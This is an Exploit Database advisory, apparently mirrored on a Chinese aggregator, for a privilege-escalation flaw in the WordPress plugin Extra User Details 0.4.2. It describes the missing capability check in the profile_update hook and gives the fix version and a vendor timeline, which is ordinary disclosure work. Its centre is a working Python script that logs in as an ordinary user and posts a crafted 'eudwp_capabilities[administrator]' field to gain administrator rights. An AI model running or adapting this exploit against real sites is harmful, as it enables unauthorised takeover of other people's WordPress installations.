WordPress Plugin Extra User Details 0.4.2 – Privilege Escalation

• Exploit Database
• 17 阅读

• 作者： Panagiotis Vagenas
  日期： 2016-02-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39489/

• """
  * Exploit Title: Extra User Details [Privilege Escalation]
  * Discovery Date: 2016-02-13
  * Exploit Author: Panagiotis Vagenas
  * Author Link: https://twitter.com/panVagenas
  * Vendor Homepage: http://vadimk.com/
  * Software Link: https://wordpress.org/plugins/extra-user-details/
  * Version: 0.4.2
  * Tested on: WordPress 4.4.2
  * Category: WebApps, WordPress
  
  
  Description
  -----------
  
  _Extra User Details_ plugin for WordPress suffers from a Privilege
  Escalation
  vulnerability.
  
  The plugin hooks the `eud_update_ExtraFields` function to `profile_update`
  WordPress action. This function doesn't properly check user capabilities
  and
  updates all meta information passed to post data. The only condition is
  that
  the post variable name has the `eud` prefix which is striped before
  updating
  the values in DB.
  
  An attacker can exploit this misbehavior to update the
  {prefix}\_capabilities
   meta information to gain administrative privileges.
  
  PoC
  ---
  
  In the following PoC we assume that the database has the `wp` prefix, a
  very
  common scenario as this is the default WordPress value
  
  """
  # !/usr/bin/python3
  
  ################################################################################
  # Extra User Details Privilege Escalation Exploit
  #
  # Author: Panagiotis Vagenas <pan.vagenas>
  #
  # Dependencies: BeautifulSoup
  (http://www.crummy.com/software/BeautifulSoup/)
  ################################################################################
  
  import requests
  from bs4 import BeautifulSoup
  
  baseUrl = 'http://example.com'
  loginUrl = baseUrl + '/wp-login.php'
  profileUrl = baseUrl + '/wp-admin/profile.php'
  
  loginPostData = {
  'log': 'username',
  'pwd': 'password',
  'rememberme': 'forever',
  'wp-submit': 'Log+In'
  }
  
  s = requests.Session()
  
  r = s.post(loginUrl, loginPostData)
  
  if r.status_code != 200:
  print('Login error')
  exit(1)
  
  r = s.get(profileUrl)
  soup = BeautifulSoup(r.text, 'html.parser')
  
  f = soup.find('form', {'id': 'your-profile'})
  if not f:
  print('Error')
  exit(1)
  
  data = {
  'eudwp_capabilities[administrator]': 1,
  }
  
  for i in f.find_all('input'):
  if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
  data[i.attrs['name']] = i.attrs['value']
  
  r = s.post(profileUrl, data)
  
  if r.status_code == 200:
  print('Success')
  
  exit(0)
  
  """
  
  Solution
  --------
  
  Upgrade to v0.4.2.1
  
  Timeline
  --------
  
  1. **2016-02-13**: Vendor notified through wordpress.org support forums
  2. **2016-02-13**: Vendor notified through through the contact form in
  his website
  3. **2016-02-13**: Vendor responded and received details about this issue
  4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue
  
  """